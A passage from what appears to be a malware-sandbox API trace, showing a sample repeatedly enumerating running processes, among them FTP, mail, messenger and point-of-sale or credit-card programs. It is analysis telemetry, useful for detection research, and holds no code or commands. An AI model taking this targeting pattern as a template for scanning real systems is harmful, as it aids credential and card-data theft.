hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0203.709] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0203.711] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0203.717] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0203.719] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0203.721] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0203.723] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0203.725] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0203.727] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0203.728] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0203.751] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0203.754] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0203.755] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0203.757] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0203.759] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0203.760] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0203.765] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0203.767] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0203.770] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0203.773] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0203.775] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0203.780] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0203.783] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0203.785] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0203.788] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0203.790] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0203.844] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0203.846] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0203.848] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0203.850] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0203.852] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0203.854] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0203.859] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0203.861] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0203.863] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0203.865] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0203.867] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0203.869] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0203.874] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0203.877] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0203.880] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0203.884] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0203.921] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0203.924] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0203.926] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0203.929] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0203.931] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0203.938] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0203.940] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0203.942] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0203.944] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0203.945] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0203.947] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0203.952] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0203.953] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0203.955] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0203.957] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0203.958] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0203.960] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0203.962] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0203.963] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0203.985] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0203.987] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0203.989] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0203.991] CloseHandle (hObject=0x11cc) returned 1 [0203.991] Sleep (dwMilliseconds=0x64) [0204.107] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x11cc [0204.117] Process32First (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0204.118] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0204.120] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0204.124] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.125] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0204.127] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0204.129] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0204.130] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0204.132] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0204.134] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.155] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.157] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0204.158] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.160] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.161] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.163] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.164] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.166] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.218] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0204.220] Process32Next (in: hSnapshot=0x11cc, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 